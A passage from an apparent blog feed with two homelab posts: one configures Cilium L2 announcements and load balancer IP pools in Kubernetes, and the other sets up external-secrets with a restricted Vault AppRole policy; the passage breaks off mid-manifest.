</span></span><span style="display:flex;"><span>    <span style="color:#f92672">clusterPoolIPv4PodCIDRList</span>: <span style="color:#ae81ff">10.8.0.0</span><span style="color:#ae81ff">/16</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">k8sServiceHost</span>: <span style="color:#ae81ff">api.k8s.example.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">k8sServicePort</span>: <span style="color:#ae81ff">6443</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kubeProxyReplacement</span>: <span style="color:#ae81ff">strict</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">operator</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">serviceAccounts</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cilium</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">operator</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium-operator</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">tunnel</span>: <span style="color:#ae81ff">vxlan</span>
</span></span></code></pre></div><p>With this config, there&rsquo;s no redeployment necessary, as it is equivalent to
what the Cilium CLI does.</p>
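<p>To be sure before switching tools, a dry run helps: with the helm-diff plugin
installed, Helmfile can show whether the extracted values would change anything
on the running release. Ideally this shows no changes at all:</p>
<pre tabindex="0"><code># Compares the Helmfile-managed release against what is currently deployed.
helmfile diff
</code></pre>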
<h1 id="cilium-l2-announcements-setup">Cilium L2 announcements setup</h1>
<p>Cilium (and load balancers in general, it seems) has two modes for announcing
IPs of services. The more complex one is the <a href="https://docs.cilium.io/en/stable/network/bgp-control-plane/">BGP mode</a>.
In this mode, Cilium would announce routes to the exposed services. This needs
an environment where BGP is configured. I decided to skip this approach, as
my network knowledge in general isn&rsquo;t that great. I&rsquo;ve only got a relatively
hazy idea of what the BGP protocol even does.</p>
<p>So I settled on the simpler approach, <a href="https://docs.cilium.io/en/latest/network/l2-announcements/">L2 Announcements</a>.
In this approach, all Cilium nodes in the cluster take part in a leader election
for each of the services which should be exposed and receive a virtual IP. The
node which wins the election then answers ARP requests for the service&rsquo;s
virtual IP with its own MAC address.
The node then regularly renews a lease in Kubernetes to signal to all other
nodes in the cluster that it&rsquo;s still there. If a lease isn&rsquo;t renewed in a certain
time frame, another node takes over the ARP announcements.</p>
<p>One consequence of this approach is the fact that this is not true load balancing.
All traffic for a given service will always arrive at one specific node. From
the documentation, this is different when using the BGP approach, as that approach
does provide true load balancing.
But what the L2 announcements approach does provide is fail over, and this is
all that I really care about for my setup, at least for now.</p>
<h2 id="cilium-config">Cilium config</h2>
<p>The first step in enabling L2 announcements is to enable the Helm option:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">l2announcements</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>Once that was done, I had the problem that nothing seemed to happen at all.
It turns out that the Helm options are written into a <code>ConfigMap</code> in the Cilium
Helm chart, which is then read by the Cilium pods. And the pods are not
restarted automatically. So to get the option to take effect, I had to
run the following two commands after deploying the updated Helm chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl rollout restart -n kube-system deployment cilium-operator
</span></span><span style="display:flex;"><span>kubectl rollout restart daemonset -n kube-system cilium
</span></span></code></pre></div><p>Then the option was active. You can see the active options in the log output
of the <code>cilium-operator</code> and <code>cilium</code> pods if you ever want to check what the
pods are actually running with.</p>
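<p>Besides the logs, the resulting agent configuration can also be dumped with the
Cilium CLI and filtered for the L2 announcement flag; the exact key name is my
assumption, so I grep broadly:</p>
<pre tabindex="0"><code># Dumps the cilium-config ConfigMap and filters for L2 announcement related keys.
cilium config view | grep -i l2
</code></pre>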
<p>If anybody out there has any idea what I might have done wrong, needing those
manual <code>rollout restart</code> calls, please ping me on <a href="https://social.mei-home.net/@mmeier">Mastodon</a>.</p>
<p>But still, nothing happens just from enabling the option. There are two manifests
which need to be deployed.</p>
<h2 id="load-balancer-ip-pools">Load balancer IP pools</h2>
<p>First, a <code>CiliumLoadBalancerIPPool</code> manifest needs to be deployed. This manifest
controls the pools of IPs which are handed out to <code>LoadBalancer</code> type services.
In my setup, the manifest looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumLoadBalancerIPPool</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium-lb-ipam</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cidrs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">cidr</span>: <span style="color:#e6db74">&#34;10.86.5.80/28&#34;</span>
</span></span></code></pre></div><p>It defines a relatively small IP range, as I don&rsquo;t expect to expose too many
services. Most of what I will expose will run through the ingress service.
Documentation on the pools and additional options can be found <a href="https://docs.cilium.io/en/stable/network/lb-ipam/">here</a>.</p>
<h2 id="l2-announcement-policies">L2 announcement policies</h2>
<p>The second piece of config is the configuration for which services should get
an IP and which nodes should do the L2 announcements. This is done via a
<code>CiliumL2AnnouncementPolicy</code> manifest, which is documented <a href="https://docs.cilium.io/en/latest/network/l2-announcements/">here</a>.</p>
<p>For me, the config looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumL2AnnouncementPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium-lb-all-services</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/role</span>: <span style="color:#ae81ff">worker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">loadBalancerIPs</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>This restricts the announcements to only happen from my worker nodes, not from
the control plane or Ceph nodes.</p>
<p>In addition, I&rsquo;m adding a <code>serviceSelector</code> here, so that only certain services
get an IP and are announced. This is necessary due to <a href="https://github.com/cilium/cilium/issues/28752">this bug</a>.
The bug leads to all services being considered for L2 announcements, regardless
of whether they are of type <code>LoadBalancer</code> or not. This doesn&rsquo;t make much
sense at all, and also costs performance, which I will go into in a later section.</p>
<h1 id="example">Example</h1>
<p>With all of that config done, let&rsquo;s have a look at an example. I used the
following deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">echo-server</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">jmalloc/echo-server</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http-port</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">8080</span>
</span></span></code></pre></div><p>This is just a simple echo server which returns a bit of information on the
HTTP request it received.
Then this is the service for exposing that pod:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsetup-service</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">testsetup.example.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http-port</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">http-port</span>
</span></span></code></pre></div><p>As noted above, only services with the <code>homelab/public-service=&quot;true&quot;</code> label
are handled by the Cilium L2 announcements. In addition, I&rsquo;m supplying the
service with an external-dns hostname to get an automated DNS entry.
In short, any requests which reach the service IP on port <code>80</code> are forwarded
to port <code>8080</code> in the pod, which is where the <code>echo-server</code> is listening.</p>
<p>One very important thing to note: Use <strong>curl</strong> for testing! Ping won&rsquo;t work,
as the service IP does not answer to <code>ping</code>.
When starting to debug, first check whether the service got an IP assigned:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n testsetup service
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>NAME                TYPE           CLUSTER-IP     EXTERNAL-IP   PORT<span style="color:#f92672">(</span>S<span style="color:#f92672">)</span>        AGE
</span></span><span style="display:flex;"><span>testsetup-service   LoadBalancer   10.7.174.128   10.86.5.93    80:32206/TCP   14h
</span></span></code></pre></div><p>The important part here is the <code>EXTERNAL-IP</code>.
Next, check whether a Kubernetes lease has been created by one of the nodes, signaling
that this node is announcing the service:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n kube-system leases.coordination.k8s.io
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>NAME                                            HOLDER       AGE
</span></span><span style="display:flex;"><span>cilium-l2announce-testsetup-testsetup-service   sehith       13h
</span></span></code></pre></div><p>You can also use <code>arping</code> to check whether there&rsquo;s anyone announcing the IP:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>arping 10.86.5.93
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#ae81ff">58</span> bytes from 00:16:3e:17:a4:31 <span style="color:#f92672">(</span>10.86.5.93<span style="color:#f92672">)</span>: index<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> time<span style="color:#f92672">=</span>253.747 usec
</span></span></code></pre></div><p>Important to note: <code>arping</code> will only work from within the same subnet, as ARP
is a layer 2 protocol. Ask me how much time I spent trying to figure out why
I didn&rsquo;t get an answer to an <code>arping</code> from a separate subnet. &#x1f609;</p>
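<p>And finally the actual test with <code>curl</code>, using the example IP from above. The
echo server simply prints back information about the request it received:</p>
<pre tabindex="0"><code># Port 80 on the service IP is forwarded to port 8080 in the echo-server pod.
curl http://10.86.5.93/
</code></pre>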
<h1 id="performance">Performance</h1>
<p>One last point I&rsquo;ve got to bring up is the efficiency of Cilium&rsquo;s L2 load
balancer approach.</p>
<p>As noted, <a href="https://github.com/cilium/cilium/issues/28752">this bug</a> made
Cilium announce every service in my cluster initially, <code>type=LoadBalancer</code> or
not.</p>
<p>This produced quite a high load increase on one of my control plane nodes:</p>
<figure>
    <img loading="lazy" src="control_load.png"
         alt="A screenshot of a Grafana plot, titled &#39;CPU Utilization&#39;. The y axis shows CPU utilization in percent, going from 82% at the bottom to 100% at the top. The x axis shows time, from 21:05 to 23:10. At the beginning, the plot shows about 89% idle load for the CPU. At around 21:20, the idle load is reduced to about 87% idle. This level of load is held until about 23:03, when the idle load increases back to about 88%."/> <figcaption>
            <p>L2 announcements were enabled for the first time around 21:20. At around 23:03, I reduced the L2 announcements to a single service, instead of 5.</p>
        </figcaption>
</figure>

<p>The CPU load on this 4-core control node increased by about 2% during the time
when Cilium had to announce the 5 services I had defined in my cluster.
This is most likely all API server/etcd load, as Cilium uses Kubernetes'
<a href="https://kubernetes.io/docs/concepts/architecture/leases/">leases</a> functionality.
For every L2 announcement, all nodes continuously check whether the current lease
holder is still holding the lease, so that another node can take over if the
one which previously did the announcement for the service failed for some reason.</p>
<p>This 2% load increase was from only five services with three nodes in the cluster.
My cluster will very likely end up with 9 worker nodes in the end, and possibly
more than 5 services. I really don&rsquo;t like where that might lead.</p>
<p>I will have to keep my eye on this while I migrate more hosts and services over
from Nomad. If it gets too bad, I will have to return to this topic and try out
MetalLB, or potentially go ahead and have a look at BGP after all.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 1: Setting up external-secrets</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-1-external-secrets/</link>
      <pubDate>Tue, 26 Dec 2023 17:29:59 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-1-external-secrets/</guid>
      <description>My setup for external-secrets with HashiCorp Vault</description>
      <content:encoded><![CDATA[<p>This is the second post in my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>I will skip the cluster setup itself in this series, as I did not make many
changes compared to my <a href="https://blog.mei-home.net/posts/kubernetes-cluster-setup/">experimental setup</a>.</p>
<p>Instead I will start with my very first deployed service, <a href="https://external-secrets.io/latest/">external-secrets</a>.</p>
<h1 id="motivation">Motivation</h1>
<p>In my initial experimentation, I decided to not go with any secrets management
and instead use <a href="https://helmfile.readthedocs.io/en/latest/remote-secrets/#remote-secrets">Helmfile&rsquo;s secret handling</a>.
But I&rsquo;ve come around to the fact that having some sort of service which can
automatically take in secrets from my <a href="https://www.vaultproject.io/">Vault</a>
instance would be pretty nice to have.
One trigger was the fact that while setting up a number of services, I found
that Helmfile&rsquo;s approach for getting secrets was not actually that great.</p>
<p>So what does external-secrets do? It is a connector between Kubernetes Secrets
and an external secrets provider. In my case, that&rsquo;s HashiCorp&rsquo;s Vault.
With external-secrets, an operator is set up. This operator watches for new
objects of type <code>ExternalSecret</code>. When one of those appears, it reads the
object&rsquo;s values and contacts Vault to fetch the secrets. Then, external-secrets
creates a new Kubernetes Secret with the secret material collected from the
external secrets provider, for use in the Kubernetes cluster.</p>
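<p>Jumping ahead a bit: once everything described below is deployed and the first
<code>ExternalSecret</code> objects exist, their sync status can be checked like that of any
other resource:</p>
<pre tabindex="0"><code># Lists all ExternalSecret objects in the cluster together with their sync status.
kubectl get externalsecrets.external-secrets.io -A
</code></pre>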
<h1 id="vault-setup">Vault setup</h1>
<p>Before I could deploy external-secrets, I had to do some reconfiguration of my
Vault setup. I&rsquo;m managing all of the setup for Vault in Terraform.</p>
<p>The first step was creating a rather restrictive policy for the external-secrets
access, as my Vault doesn&rsquo;t just provide secrets for my workloads, but also for
my Ansible playbooks and image generation setup. For now, I&rsquo;m planning to
restrict access to just the <a href="https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v1">Vault kv secrets store</a>,
and only particular paths therein.
A policy for that might look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;secret/my_kubernetes_secrets/cluster/*&#34;</span> {
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [ <span style="color:#e6db74">&#34;read&#34;</span> ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>With that, if my k8s cluster ever gets breached, the attacker will at most have
access to the Kubernetes specific secrets.
This policy is then added to Vault via Terraform like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_policy&#34; &#34;external-secrets&#34;</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;external-secrets&#34;</span>
</span></span><span style="display:flex;"><span>  policy <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;path-to-file.hcl&#34;</span>)
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Policies as short as this could also be added verbatim instead of having a
separate file and loading that, but I like it better like this.</p>
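<p>After a <code>terraform apply</code>, the result can be verified directly against Vault:</p>
<pre tabindex="0"><code># Prints the policy as Vault stored it.
vault policy read external-secrets
</code></pre>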
<p>The second part of the Vault setup is the authentication. For this I chose
Vault&rsquo;s <a href="https://developer.hashicorp.com/vault/docs/auth/approle">AppRole</a>,
which is intended for use cases exactly like this. I did not actually have that
auth backend configured yet, so I added it like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_auth_backend&#34; &#34;approle&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;approle&#34;</span>
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;approle&#34;</span>
</span></span><span style="display:flex;"><span>  local <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I just kept the default mount path. In addition to mounting the backend, I also
needed to create a role for external-secrets. For my setup, it looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_approle_auth_backend_role&#34; &#34;external-secrets&#34;</span> {
</span></span><span style="display:flex;"><span>  backend <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_auth_backend</span>.<span style="color:#66d9ef">approle</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  role_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;external-secrets&#34;</span>
</span></span><span style="display:flex;"><span>  token_policies <span style="color:#f92672">=</span> [<span style="color:#66d9ef">vault_policy</span>.<span style="color:#66d9ef">external</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">secrets</span>.<span style="color:#66d9ef">name</span>]
</span></span><span style="display:flex;"><span>  secret_id_bound_cidrs <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;10.1.1.0/24&#34;</span>]
</span></span><span style="display:flex;"><span>  token_bound_cidrs <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;10.1.1.0/24&#34;</span>]
</span></span><span style="display:flex;"><span>  token_explicit_max_ttl <span style="color:#f92672">=</span> <span style="color:#ae81ff">86400</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This creates an application role with the previously created access policy and
the default policy attached. The default policy just allows things like looking
up your own token but doesn&rsquo;t grant any secret access.
For additional security, I also configured restricted CIDRs for both the
<code>secret-id</code>, which is used to log in, and the tokens produced for the role after
login. This restricts the IPs from which logins can happen and after that
restricts the IPs from which the generated tokens can be used.
For purely best practices reasons, I also restricted the max TTL for tokens
created for this role to 24h.</p>
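<p>To verify that the role behaves as intended, a manual login is useful, using the
<code>role-id</code> and a <code>secret_id</code> retrieved as shown a bit further down; the two
variables here are just placeholders:</p>
<pre tabindex="0"><code># Manual AppRole login test; ROLE_ID and SECRET_ID are placeholders for the
# values retrieved via the commands shown below.
vault write auth/approle/login role_id="$ROLE_ID" secret_id="$SECRET_ID"
</code></pre>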
<p>What I decided not to do here was to also set a TTL for the <code>secret_id</code>. This
is due to the fact that while external-secrets can renew tokens if they become
invalid, it cannot automatically get a new <code>secret_id</code>. So I&rsquo;ve added the
<code>secret_id</code> to my regular manual secrets rotation plan. I definitely need to
write a playbook or script to do all of those rotations at some point. &#x1f62c;</p>
<p>Once all of the above has been configured and Terraform has been executed,
there are two pieces of information needed to configure external-secrets.
The first one is the AppRole <code>role-id</code>. It can be collected via this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault read auth/approle/role/external-secrets/role-id
</span></span></code></pre></div><p>The second piece is the <code>secret_id</code>. A fresh one is generated and shown every
time the following Vault command is executed:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault write -force auth/approle/role/external-secrets/secret-id
</span></span></code></pre></div><p>The <code>-force</code> is required here because normally Vault needs at least some input
parameters, but in this case I didn&rsquo;t need any.</p>
<p>Finally, I stored the <code>secret_id</code> in the Vault KV store for later access by
my external-secrets deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv put secret/my_kubernetes_secrets/role-secret secret-id<span style="color:#f92672">=</span>-
</span></span></code></pre></div><p>In theory, I could also have gotten the <code>secret_id</code> via Terraform and then
written it to the KV store also via Terraform. But that would have meant that
the <code>secret_id</code> would have ended up in the Terraform state. Not optimal.</p>
<h1 id="kubernetes-deployment">Kubernetes deployment</h1>
<p>With all of the Vault config now prepared, the next step is to actually deploy
external-secrets. And this went relatively well. I used the
<a href="https://github.com/external-secrets/external-secrets/tree/main/deploy/charts/external-secrets">official Helm chart</a>.</p>
<p>I&rsquo;m using <a href="https://github.com/helmfile/helmfile">Helmfile</a> for managing the
deployments in my Kubernetes cluster. I will not go into the details here, but
I&rsquo;ve got a draft for a post on my deployment setup almost done and will finish
it after this post.</p>
<p>My <code>values.yaml</code> file for the Helm chart looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">approleSecretId</span>: {{ <span style="color:#e6db74">&#34;ref+vault://secret/my_kubernetes_secrets/role-secret#/secret-id&#34;</span> <span style="color:#ae81ff">| fetchSecretValue }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">approleId</span>: {{ <span style="color:#e6db74">&#34;ref+vault://auth/approle/role/external-secrets/role-id#/role_id&#34;</span> <span style="color:#ae81ff">| fetchSecretValue }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">caBundle</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  {{- exec &#34;curl&#34; (list &#34;https://vault.example.com:/v1/my-ca/ca/pem&#34;) | nindent 2 }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">external-secrets</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">external-secrets</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">webhook</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certManager</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>The <code>ref+vault</code> syntax uses <a href="https://helmfile.readthedocs.io/en/latest/remote-secrets/">Helmfile&rsquo;s secret management</a>
to get the AppRole credentials from my Vault instance during deployment.
The <code>caBundle</code> value will later be used to supply the SecretStore with my
internal CA so external-secrets can validate the TLS cert coming from my Vault
instance. I will go over this in detail later.</p>
<p>The values under <code>external-secrets</code> are the actual values for the external-secrets
Helm chart, as that chart is managed as a dependency.
I&rsquo;m not doing anything special here, just explicitly disabling the <code>serviceMonitor</code>.
This is mostly so that I can later grep over my Homelab repo and find all apps
providing service monitors once I&rsquo;ve deployed Prometheus.</p>
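<p>To illustrate what I mean, a simple search like the following should later turn
up every chart where I have explicitly toggled a service monitor. The repo path
here is just a hypothetical example:</p>
<pre tabindex="0"><code>grep -r serviceMonitor ~/homelab/helmfile/
</code></pre>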
<h1 id="enabling-the-vault-secrets-store">Enabling the Vault secrets store</h1>
<p>In external-secrets, the different supported secrets providers can be enabled
separately via <code>SecretStore</code> or <code>ClusterSecretStore</code> manifests. I decided to
use the <code>ClusterSecretStore</code>, as per-namespace stores didn&rsquo;t look
like they would make much sense.
My thinking here is that yes, I could provide one store per namespace, which
would mean one store per deployed app. I could then create different roles for
each of these stores in Vault and give them highly restrictive policies to only
access what they really need.</p>
<p>But in Kubernetes, it&rsquo;s not the pods themselves which have access to the
Secrets and the secret stores. It&rsquo;s the admins and operators who create and
write manifests. In the case of this cluster, that&rsquo;s only me. And I&rsquo;ve already
got all the permissions there are. So if somebody were to get into my Kubernetes
account, they would have access to anything anyway. So it didn&rsquo;t make much sense
to me to work with different secret stores.</p>
<p>Without further delay, here is my <code>ClusterSecretStore</code> manifest:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
